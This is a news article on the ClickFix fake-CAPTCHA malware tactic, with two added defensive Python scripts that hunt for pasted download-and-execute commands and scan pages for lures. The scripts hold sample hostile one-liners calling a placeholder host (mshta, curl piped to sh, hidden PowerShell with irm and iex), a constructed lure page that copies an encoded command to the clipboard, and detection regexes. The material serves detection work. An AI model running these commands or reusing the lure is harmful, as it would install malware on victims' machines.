ClickFix Malware Uses Fake CAPTCHAs for Infections

A sophisticated blend of propagation methods, clever narratives, and advanced evasion techniques has fueled the rise of the social engineering tactic known as ClickFix over the past year, according to new research from Guardio Labs.
Security researcher Shaked Chen notes that this new strain has rapidly outpaced the infamous fake browser update scam.
“Like a real-world virus variant, this new ‘ClickFix’ strain quickly outpaced and ultimately wiped out the infamous fake browser update scam that plagued the web just last year,” Chen stated in a report. “It did so by removing the need for file downloads, using smarter social engineering tactics, and spreading through trusted infrastructure. The result - a wave of infections ranging from mass drive-by attacks to hyper-targeted spear-phishing lures.”
What is the ClickFix Tactic?
First detected in the wild in early 2024, ClickFix is a social engineering tactic where prospective targets are tricked into infecting their own machines. The attack masquerades as a necessary fix for a non-existent issue or a simple CAPTCHA verification.
Attackers use a wide range of infection vectors, including phishing emails, drive-by downloads, malvertising, and search engine optimization (SEO) poisoning, to lure users to counterfeit pages displaying these error messages.
How the Attack Infects Systems
The fake pages have a single objective: to guide victims through a series of steps that cause them to unknowingly copy a malicious command to their clipboard. The user is then instructed to paste and execute this command in the Windows Run dialog box or the Terminal app on Apple macOS.
The pasted command kicks off a multi-stage sequence that ultimately deploys malware. Observed payloads include information stealers, remote access trojans (RATs), and loaders, which shows how flexible the delivery mechanism is: the lure is the same, only the final stage changes.
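The mechanism described above leaves two artefacts a responder can hunt for: a process spawned by the Run dialog (its parent is explorer.exe on Windows; on macOS the pasted command runs under the Terminal's shell) whose command line downloads and executes something, and the HKCU\...\Explorer\RunMRU registry key, which records what the user typed into Win+R. The following is an added example, not Guardio's tooling or anything from the report; the event lines and the .reg export are constructed, example.invalid is a placeholder host, and the indicator regexes are illustrative assumptions rather than a complete signature set.

```python
"""Hunt for ClickFix-style execution on an endpoint (added example, not from the report).

Check 1: Sysmon-style process-creation events (constructed) for download-and-execute
         command lines, noting whether the parent is consistent with a paste into the
         Win+R Run dialog (explorer.exe) or a macOS Terminal shell.
Check 2: the RunMRU key from a (constructed) .reg export, which keeps the Run dialog
         history newest-first in its MRUList value.
"""
import json
import re

# Assumed indicator patterns for the one-liners ClickFix lures ask victims to paste.
INDICATORS = [
    (re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I), "mshta fetching a remote HTA"),
    (re.compile(r"powershell.*(?:-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s)", re.I),
     "hidden or encoded PowerShell"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b.*\|\s*"
                r"(?:iex|invoke-expression|bash|sh|zsh)\b", re.I),
     "download piped into an interpreter"),
    (re.compile(r"\b(?:bitsadmin|certutil)(?:\.exe)?\b.*https?://", re.I), "LOLBin downloader"),
]
RUN_DIALOG_PARENTS = ("explorer",)          # Win+R children are spawned by explorer.exe
INTERACTIVE_SHELLS = ("zsh", "bash", "sh")  # macOS Terminal.app runs the pasted line in a shell


def match_indicators(cmdline):
    """Return the labels of every indicator that fires on a command line."""
    return [label for rx, label in INDICATORS if rx.search(cmdline)]


def _basename(path):
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def triage_process_events(lines):
    """Flag events whose command line matches; pasted_interactively marks a Run-dialog/terminal parent."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        reasons = match_indicators(ev.get("CommandLine", ""))
        if not reasons:
            continue
        parent = _basename(ev.get("ParentImage", ""))
        hits.append({"pid": ev["ProcessId"], "parent": parent, "reasons": reasons,
                     "pasted_interactively": parent in RUN_DIALOG_PARENTS or parent in INTERACTIVE_SHELLS})
    return hits


# Constructed events using Sysmon Event ID 1 field names (pid 4041 is a second stage, not a paste).
SAMPLE_EVENTS = [json.dumps(e) for e in (
    {"ProcessId": 4012, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ProcessId": 4020, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad"},
    {"ProcessId": 4033, "ParentImage": "/bin/zsh",
     "Image": "/usr/bin/curl", "CommandLine": "curl -fsSL https://example.invalid/fix.sh | sh"},
    {"ProcessId": 4041, "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://example.invalid/a | iex"'},
)]

# Constructed .reg export of the Run dialog history; Explorer appends "\1" to every entry.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"irm https://example.invalid/a | iex\"\\1"
"c"="cmd\\1"
"MRUList"="bca"
"""
REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>(?:[^"\\]|\\.)*)"$')


def parse_runmru(reg_text):
    """Return [(slot, command, indicator labels)] in MRU order (newest first)."""
    values, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_key = line.lower().endswith("\\explorer\\runmru]")
            continue
        m = REG_VALUE.match(line) if in_key else None
        if m:
            values[m["name"]] = re.sub(r"\\(.)", r"\1", m["value"])  # undo .reg escaping
    order = values.pop("MRUList", "")
    history = []
    for slot in order:
        cmd = values.get(slot, "")
        cmd = cmd[:-2] if cmd.endswith("\\1") else cmd
        history.append((slot, cmd, match_indicators(cmd)))
    return history


if __name__ == "__main__":
    for hit in triage_process_events(SAMPLE_EVENTS):
        print("process", hit)
    for slot, cmd, reasons in parse_runmru(SAMPLE_REG_EXPORT):
        print("RunMRU", slot, repr(cmd), reasons or "-")
```

Pid 4041 is reported but not marked as pasted interactively because its parent is powershell.exe rather than explorer.exe: that is a later stage, and a rule that keys only on the explorer.exe parent would miss it, so the parent is recorded as context rather than used as a filter. The RunMRU check works from a plain `reg export` on a live host or from an offline NTUSER.DAT converted to text, which makes it useful in forensics even after the process telemetry has rolled over.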
An Evolved Threat: From ClearFake to CAPTCHAgeddon
The tactic has become so potent and effective that Guardio Labs has dubbed the phenomenon a “CAPTCHAgeddon,” with dozens of campaigns being launched by both cybercriminal groups and nation-state actors in a short period.
ClickFix is considered a stealthier evolution of ClearFake, an earlier campaign that used compromised WordPress sites to show fake browser update pop-ups. ClearFake later added evasion tactics such as EtherHiding, which hides its payload in BNB Smart Chain (BSC, formerly Binance Smart Chain) smart contracts.
The success of ClickFix stems from its continuous refinement of propagation vectors, lure messaging, and evasion techniques, which have allowed it to ultimately supplant the ClearFake campaign.
“Early prompts were generic, but they quickly became more persuasive, adding urgency or suspicion cues,” Chen explained. “These tweaks increased compliance rates by exploiting basic psychological pressure.”
Advanced Evasion and Refinement
Attackers have adapted their methods in several notable ways to avoid detection. They have abused Google Scripts to host the fake CAPTCHA flows, leveraging the inherent trust in Google's domain. Additionally, they have embedded malicious payloads within legitimate-looking file sources, such as socket.io.min.js, to appear benign.
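Because the lure can be hosted on a trusted domain and its payload hidden behind a library-looking file name, neither the host nor the script name is a reliable signal on its own; what distinguishes a ClickFix page is the combination of a clipboard write, instructions to open the Run dialog or a terminal and paste, and a shell command somewhere in the page, possibly obfuscated. The scanner below is an added example, not Guardio's code or anything from the report: it runs over two constructed pages (a fake CAPTCHA lure that base64-encodes its command, and a harmless "copy link" button), decodes atob() literals before looking for command tokens, and lists external script hosts as context rather than as a verdict. The regexes, the Google Apps Script URL and example.invalid are assumptions for illustration.

```python
"""Static triage of a web page for ClickFix-style fake CAPTCHA lures (added example)."""
import base64
import re

CLIPBOARD_WRITE = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# Instructions that only make sense if the user is meant to paste into Win+R or a terminal.
PASTE_INSTRUCTIONS = re.compile(
    r"win(?:dows)?(?:\s+key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b|run\s+dialog|open\s+(?:the\s+)?terminal", re.I)
SHELL_TOKENS = re.compile(r"\b(powershell|pwsh|mshta|cmd\.exe|curl|wget|iex|invoke-expression)\b", re.I)
B64_LITERAL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
EXTERNAL_SCRIPT = re.compile(r"<script[^>]+src=['\"](https?://[^'\"]+)['\"]", re.I)


def decode_b64_literals(text):
    """Decode every atob('...') literal so an encoded command is inspected in the clear."""
    decoded = []
    for lit in B64_LITERAL.findall(text):
        try:
            decoded.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError; skip non-base64 literals
            continue
    return decoded


def scan_page(html):
    """Return the individual signals and a verdict for one page's HTML."""
    corpus = html + "\n" + "\n".join(decode_b64_literals(html))
    signals = {
        "clipboard_write": bool(CLIPBOARD_WRITE.search(corpus)),
        "paste_instructions": bool(PASTE_INSTRUCTIONS.search(corpus)),
        "shell_tokens": sorted({m.group(1).lower() for m in SHELL_TOKENS.finditer(corpus)}),
        "external_scripts": EXTERNAL_SCRIPT.findall(html),
    }
    # A clipboard write by itself is ordinary web behaviour (copy-link buttons); it is
    # the pairing with paste instructions and a command that marks a ClickFix lure.
    is_lure = signals["clipboard_write"] and signals["paste_instructions"] and bool(signals["shell_tokens"])
    signals["verdict"] = "clickfix_lure" if is_lure else "benign"
    return signals


# Constructed lure: the command never appears in plain text, only base64-encoded.
LURE_COMMAND = 'powershell -w hidden -c "irm https://example.invalid/v | iex"'
LURE_HTML = f"""<!doctype html><html><body>
<h2>Verify you are human</h2>
<p>1. Press <b>Windows key + R</b><br>2. Press <b>CTRL + V</b><br>3. Press <b>Enter</b></p>
<button onclick="verify()">I'm not a robot</button>
<script src="https://script.google.com/macros/s/EXAMPLE_DEPLOYMENT_ID/exec"></script>
<script>
function verify() {{
  var c = atob("{base64.b64encode(LURE_COMMAND.encode()).decode()}");
  navigator.clipboard.writeText(c);
}}
</script></body></html>"""

# Constructed benign page: writes to the clipboard but gives no paste instructions.
BENIGN_HTML = """<!doctype html><html><body>
<input id="link" value="https://example.invalid/post/42">
<button onclick="navigator.clipboard.writeText(document.getElementById('link').value)">Copy link</button>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("lure", LURE_HTML), ("benign", BENIGN_HTML)):
        print(name, scan_page(page))
```

The base64 decoding step is what makes the difference here: without it the lure page contains no shell token at all and the verdict would fall back to benign. Real lures use other encodings and dynamic loading as well, so a production version would run the page in a headless browser and inspect what actually lands on the clipboard rather than rely on static regexes; the structure of the decision (clipboard write plus paste instructions plus a command) stays the same.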
Chen concluded with a stark warning about the technical sophistication of these threat actors.
“This chilling list of techniques – obfuscation, dynamic loading, legitimate-looking files, cross-platform handling, third-party payload delivery, and abuse of trusted hosts like Google – demonstrates how threat actors have continuously adapted to avoid detection. It is a stark reminder that these attackers are not just refining their phishing lures or social engineering tactics but are investing heavily in technical methods to ensure their attacks remain effective and resilient against security measures.”